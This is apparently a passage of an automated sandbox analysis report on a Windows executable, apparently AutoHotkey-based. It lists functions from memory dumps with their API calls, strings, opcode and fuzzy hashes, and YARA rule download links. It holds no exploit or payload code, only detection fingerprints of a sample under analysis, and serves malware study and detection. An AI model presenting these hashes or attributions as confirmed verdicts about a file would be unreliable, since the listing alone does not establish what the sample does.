Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: LongWindow$ErrorLast$InvalidateRect
String ID: +-^
API String ID: 3388266950-1738561039
Opcode ID: 5e8fe7a1c114fae472db693d349abad126b2ad28f40d2081be0960c95d0ecd64
Instruction ID: c6dd063d3170bb1408efe806915cf4dd2fb55dc0e2e483b9874a5b4879949524
Opcode Fuzzy Hash: 5e8fe7a1c114fae472db693d349abad126b2ad28f40d2081be0960c95d0ecd64
Instruction Fuzzy Hash: 79319C31204A8091FA6ADB23D5943FD2392BB4CBE4F544715EB2697AF0DB7EC586E300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003946B, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

CreateDCW.GDI32 ref: 0000000140039891
GetDeviceCaps.GDI32 ref: 00000001400398A2
GetStockObject.GDI32 ref: 00000001400398B0
SelectObject.GDI32 ref: 00000001400398BF
GetTextFaceW.GDI32 ref: 00000001400398D5
GetTextMetricsW.GDI32 ref: 00000001400398E5

Strings

DISPLAY, xrefs: 0000000140039885

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ObjectText$CapsCreateDeviceFaceMetricsSelectStock
String ID: DISPLAY
API String ID: 2440455471-865373369
Opcode ID: 5b97d5be47e8b8656e8eff2459fc4e450176f0a4993cf15bfc7a6d53ee72cf7a
Instruction ID: f28422f8fe1c12afc2f71dd1a7b459f1d75d16913336127d82ad0e735817c376
Opcode Fuzzy Hash: 5b97d5be47e8b8656e8eff2459fc4e450176f0a4993cf15bfc7a6d53ee72cf7a
Instruction Fuzzy Hash: A8319E36204B428AEB7B8F2B94507EA33A0F359784F144119EF5607FA8DB398995CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003965A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

CreateDCW.GDI32 ref: 0000000140039891
GetDeviceCaps.GDI32 ref: 00000001400398A2
GetStockObject.GDI32 ref: 00000001400398B0
SelectObject.GDI32 ref: 00000001400398BF
GetTextFaceW.GDI32 ref: 00000001400398D5
GetTextMetricsW.GDI32 ref: 00000001400398E5

Strings

DISPLAY, xrefs: 0000000140039885

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ObjectText$CapsCreateDeviceFaceMetricsSelectStock
String ID: DISPLAY
API String ID: 2440455471-865373369
Opcode ID: 98a24de7ba55c04d38065658e27677ee63340f0f86d4fce66029148b24d1cf15
Instruction ID: ea72498954af463fb252bc9d2173c1445986659b72ea92234b55286d26e295d0
Opcode Fuzzy Hash: 98a24de7ba55c04d38065658e27677ee63340f0f86d4fce66029148b24d1cf15
Instruction Fuzzy Hash: 14319E366017428AEB7B8F2BE4547EA33A0F359784F544119EF4607FA8DB39C995CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140039684, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

CreateDCW.GDI32 ref: 0000000140039891
GetDeviceCaps.GDI32 ref: 00000001400398A2
GetStockObject.GDI32 ref: 00000001400398B0
SelectObject.GDI32 ref: 00000001400398BF
GetTextFaceW.GDI32 ref: 00000001400398D5
GetTextMetricsW.GDI32 ref: 00000001400398E5
GetIconInfo.USER32 ref: 00000001400399BF
GetObjectW.GDI32 ref: 00000001400399E6
DeleteObject.GDI32 ref: 0000000140039ABA
DeleteObject.GDI32 ref: 0000000140039AC4
MulDiv.KERNEL32 ref: 0000000140039AE3
SetRect.USER32 ref: 0000000140039B19
MulDiv.KERNEL32 ref: 0000000140039B49
CreateFontW.GDI32 ref: 0000000140039BC2
MulDiv.KERNEL32 ref: 0000000140039BE7
CreateFontW.GDI32 ref: 0000000140039C4B

Strings

DISPLAY, xrefs: 0000000140039885

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Object$Create$DeleteFontText$CapsDeviceFaceIconInfoMetricsRectSelectStock
String ID: DISPLAY
API String ID: 254724913-865373369
Opcode ID: 7afd9e268ae29a1e7efee5f73faa62c3cba9efffba365e9c5618ee78d223786d
Instruction ID: 4345f1b29b508bf8388c2995e996e58980ec9e0b9e9d11ded086e5af7502f2b0
Opcode Fuzzy Hash: 7afd9e268ae29a1e7efee5f73faa62c3cba9efffba365e9c5618ee78d223786d
Instruction Fuzzy Hash: B431AE326057818AEB2B8F26E4547EE33A1F35D784F144119EF4A07FA4DB39C595CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140039462, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

CreateDCW.GDI32 ref: 0000000140039891
GetDeviceCaps.GDI32 ref: 00000001400398A2
GetStockObject.GDI32 ref: 00000001400398B0
SelectObject.GDI32 ref: 00000001400398BF
GetTextFaceW.GDI32 ref: 00000001400398D5
GetTextMetricsW.GDI32 ref: 00000001400398E5
GetIconInfo.USER32 ref: 00000001400399BF
GetObjectW.GDI32 ref: 00000001400399E6
DeleteObject.GDI32 ref: 0000000140039ABA
DeleteObject.GDI32 ref: 0000000140039AC4
MulDiv.KERNEL32 ref: 0000000140039AE3
SetRect.USER32 ref: 0000000140039B19
MulDiv.KERNEL32 ref: 0000000140039B49
CreateFontW.GDI32 ref: 0000000140039BC2
MulDiv.KERNEL32 ref: 0000000140039BE7
CreateFontW.GDI32 ref: 0000000140039C4B

Strings

DISPLAY, xrefs: 0000000140039885

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Object$Create$DeleteFontText$CapsDeviceFaceIconInfoMetricsRectSelectStock
String ID: DISPLAY
API String ID: 254724913-865373369
Opcode ID: e4788aac5e069e6f57218dc2d0fd88ef01557d6888c885dd40041b05e3ed4454
Instruction ID: 7ee0e317a325b17f37c135734ea546defc8fbd34a4e416b1f4aed8d9820c1a9d
Opcode Fuzzy Hash: e4788aac5e069e6f57218dc2d0fd88ef01557d6888c885dd40041b05e3ed4454
Instruction Fuzzy Hash: 58316D32601B428AEB6A8F26A4547EA33A1F359B84F144219EF5A07FE4DB39C595CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004B160, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32 ref: 000000014004B16C
GetCurrentDirectoryW.KERNEL32 ref: 000000014004B1B7
SetCurrentDirectoryW.KERNEL32 ref: 000000014004B1FD
GetCurrentDirectoryW.KERNEL32 ref: 000000014004B20F

Strings

C:\Users\user\Desktop, xrefs: 000000014004B197
:, xrefs: 000000014004B1C7
%s\, xrefs: 000000014004B1E7

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID: %s\$:$C:\Users\user\Desktop
API String ID: 1611563598-1530560589
Opcode ID: 7629f040e34234f63d2b5128c6bbb84deb6c40e1d0e963b3b1296bb795920d50
Instruction ID: f190399a93cb8091d0ff56b95319e99007c23e63b8c22ae9d14a1bb3073ecb65
Opcode Fuzzy Hash: 7629f040e34234f63d2b5128c6bbb84deb6c40e1d0e963b3b1296bb795920d50
Instruction Fuzzy Hash: C121F4B1B0828041FB639B33EE543EE63A0AB5DBD4F445125AB54476F5DBBCC185C318

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400753F0, Relevance: 12.2, APIs: 8, Instructions: 182COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000014007545B
GetWindowLongW.USER32 ref: 0000000140075484
IsDlgButtonChecked.USER32 ref: 000000014007552F
IsDlgButtonChecked.USER32 ref: 000000014007556E
IsDlgButtonChecked.USER32 ref: 00000001400755D2
IsDlgButtonChecked.USER32 ref: 000000014007560F
IsDlgButtonChecked.USER32 ref: 0000000140075631
IsDlgButtonChecked.USER32 ref: 0000000140075681

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked$LongWindow
String ID:
API String ID: 1235662423-0
Opcode ID: 9911b2e64664ce16936b66a1e959905f494cb035cf5cbc359ce5ae1c363b0b1f
Instruction ID: b2cdfd3e1a51a8f5ad414e798f89a061ef4449d98d175c90307e114efbd1bcf8
Opcode Fuzzy Hash: 9911b2e64664ce16936b66a1e959905f494cb035cf5cbc359ce5ae1c363b0b1f
Instruction Fuzzy Hash: 4E71BE7220468082F772AB16E4547EA77A1F78DBE6F505211EBA607AF4DBBCC582C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007A260, Relevance: 12.1, APIs: 8, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 000000014007A285
ScreenToClient.USER32 ref: 000000014007A29F
GetClientRect.USER32 ref: 000000014007A2AD
GetWindowLongW.USER32 ref: 000000014007A2BB
SetWindowLongW.USER32 ref: 000000014007A2E5
IsDlgButtonChecked.USER32 ref: 000000014007A2FF
SetWindowLongW.USER32 ref: 000000014007A314
IsDlgButtonChecked.USER32 ref: 000000014007A328

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$Long$ButtonCheckedClientRect$Screen
String ID:
API String ID: 661090996-0
Opcode ID: 61cf0e7a1b81c53e02c7ac5281ee6b5b3938de98cadc65529b9d5f19875b0010
Instruction ID: cbf3b4413ceb655f820b546c70f3d299f71cebd80e11265ea6567cace6227467
Opcode Fuzzy Hash: 61cf0e7a1b81c53e02c7ac5281ee6b5b3938de98cadc65529b9d5f19875b0010
Instruction Fuzzy Hash: E9213E36609A4087D765CF2AE59079EB3A0F79CBD0F449125EB9A83BA8DF3CC555CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140069050, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

<<>>, xrefs: 00000001400693C4
Out of memory., xrefs: 000000014006916B
Memory limit reached (see #MaxMem in the help file)., xrefs: 00000001400690C1

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: <<>>$Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 0-651194365
Opcode ID: bfd6390ade72c9ca1e81ae5f2987559ccaec4fa7611cf776e3d8b13f720f7e4d
Instruction ID: af184017a8ee0f077e616a32eab505d1a79bee8366cff1e49cf33c2afaf683f9
Opcode Fuzzy Hash: bfd6390ade72c9ca1e81ae5f2987559ccaec4fa7611cf776e3d8b13f720f7e4d
Instruction Fuzzy Hash: 24E19C72204B9081EA22CB22E8403E967AAF75DBD4F640A16EB9D17FF5DF78C556C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400BB19C, Relevance: 10.8, APIs: 7, Instructions: 294COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001400BB5E1

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b7da6e54634a613febdc7499532ee12609ae9a6a20d4f56ebca04d00fb875e8d
Instruction ID: 9e13947ad5bdadd436d079845afac873d090fb7dfab2e257797636c42161331e
Opcode Fuzzy Hash: b7da6e54634a613febdc7499532ee12609ae9a6a20d4f56ebca04d00fb875e8d
Instruction Fuzzy Hash: 69C1BC72204F8486EB728FA794503EE6BB1B798BD0F954115BB4A077B6CBB8CA418705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140083570, Relevance: 10.7, APIs: 7, Instructions: 238registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 00000001400835F1
RegSetValueExW.ADVAPI32 ref: 00000001400838D1
RegCloseKey.ADVAPI32 ref: 00000001400838DE
GetLastError.KERNEL32 ref: 00000001400838ED

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorLastValue
String ID:
API String ID: 3352405036-0
Opcode ID: 1ece1753be697b0ba6ea9dcd980881db14879e0d5350af68fe415455737ac268
Instruction ID: e837a2369f46627509b9c769784b970d282cd45b819b397eab675bc70467dc9a
Opcode Fuzzy Hash: 1ece1753be697b0ba6ea9dcd980881db14879e0d5350af68fe415455737ac268
Instruction Fuzzy Hash: 26A1A07260878485EB729F26E4407EA77A1F788BE0F946215FB5943BF5DF38C6458B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140063030, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0000000140063057
new.LIBCMT ref: 000000014006316F

Strings

ComObjType, xrefs: 00000001400631E2

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: ComObjType
API String ID: 0-2003225836
Opcode ID: 9276b20c02cd6607505767123e374fc801ac9fff56921a5e2674b1b9ae3aaea5
Instruction ID: 262d667ae990571d154d7b3f1097be2b7a672fba3a2605e6db44d3ff6a401b86
Opcode Fuzzy Hash: 9276b20c02cd6607505767123e374fc801ac9fff56921a5e2674b1b9ae3aaea5
Instruction Fuzzy Hash: 36917B72204B4082EB56DF26E8543AE77A2F789BC4F118925EB4E477B4DF39C546C780

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140059120, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 00000001400591F9
IsDlgButtonChecked.USER32 ref: 0000000140059243
IsDlgButtonChecked.USER32 ref: 0000000140059327
IsDlgButtonChecked.USER32 ref: 0000000140059351

Strings

Col, xrefs: 000000014005920A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked
String ID: Col
API String ID: 1719414920-737980560
Opcode ID: 4fbabe91d4fd1daac4ec899add2c67dec4388ba49a3b8a1dc4f21495de06c991
Instruction ID: f379b3b42463a38931f8fe8274df119777f03e3c4da839d50488815a9d8095bb
Opcode Fuzzy Hash: 4fbabe91d4fd1daac4ec899add2c67dec4388ba49a3b8a1dc4f21495de06c991
Instruction Fuzzy Hash: D751BC32204B4195FB62DB67A4847E973A0F78DBD1F948121FF5A87BE4DA3AC941C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140023420, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 149COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00000001400235B7

Strings

Missing "]", xrefs: 00000001400234DB
Duplicate declaration., xrefs: 00000001400235A9
Out of memory., xrefs: 0000000140023545, 0000000140023601
Not a valid method, class or property definition., xrefs: 0000000140023476
%.*s.Get%s, xrefs: 0000000140023573

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: %.*s.Get%s$Duplicate declaration.$Missing "]"$Not a valid method, class or property definition.$Out of memory.
API String ID: 0-1119647260
Opcode ID: 30543d4d50e45b27abc8b651abc9ec850dc7432be55ea237291b2cec81e0529f
Instruction ID: b4d8e0e3d4aa16ea581e12d6222c4481d55b3ae242e9f6f9aaba089aa71baa8c
Opcode Fuzzy Hash: 30543d4d50e45b27abc8b651abc9ec850dc7432be55ea237291b2cec81e0529f
Instruction Fuzzy Hash: 4451BF32600A8081FB62AB5BE4003E967A1E75CBD4F848126FF4D577F5EB38C996C341

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032220, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140032377
GetTickCount.KERNEL32 ref: 00000001400323BC

Strings

MZ@, xrefs: 00000001400323AD
<<>>, xrefs: 00000001400322E2

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick
String ID: <<>>$MZ@
API String ID: 536389180-2574836979
Opcode ID: ea37e02fed2d5afe7ddbbf884b4bd9f90112de5e3ea19ca33ef385fb10839d6a
Instruction ID: be6f4c31223da8cf9c46c11ae00ee9d3f4017d8d6ab25a0c9dede99871355013
Opcode Fuzzy Hash: ea37e02fed2d5afe7ddbbf884b4bd9f90112de5e3ea19ca33ef385fb10839d6a
Instruction Fuzzy Hash: 596139B5204B8486E723DB27F8803DA77A1B78CBD4F444125EB9947AB6DB7CC555C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B34C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00000001400B35E2

Strings

MZ@, xrefs: 00000001400B34DF, 00000001400B358A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MZ@
API String ID: 190572456-2978689999
Opcode ID: ceba81021bf5831b0e3ae711eece23b613db937a541ba99b4eb189774613d777
Instruction ID: 6a9c051ef04e1f91cfc8a815b26d513be8ac348aa81f8e0978f322eb574e6ca8
Opcode Fuzzy Hash: ceba81021bf5831b0e3ae711eece23b613db937a541ba99b4eb189774613d777
Instruction Fuzzy Hash: 4441F772305E0091FE279F87A8147E663A5B70CBE0F294529BF294B7A4DE3CC4449740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000C080, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000000014000C0AF
GetTickCount.KERNEL32 ref: 000000014000C0C9
GetTickCount.KERNEL32 ref: 000000014000C21D
PostMessageW.USER32 ref: 000000014000C240

Strings

call, xrefs: 000000014000C1DB
%u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file), xrefs: 000000014000C103

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$MessagePost
String ID: %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file)$call
API String ID: 1796604469-3729902611
Opcode ID: 2c862204fdc55614bd57a39d1f6199da74ce8280ebae622f806b7ffb40ea7368
Instruction ID: c78dff425b4484b3d511f7240cc07ec946b34894d9b8a0f45abac12286780ecf
Opcode Fuzzy Hash: 2c862204fdc55614bd57a39d1f6199da74ce8280ebae622f806b7ffb40ea7368
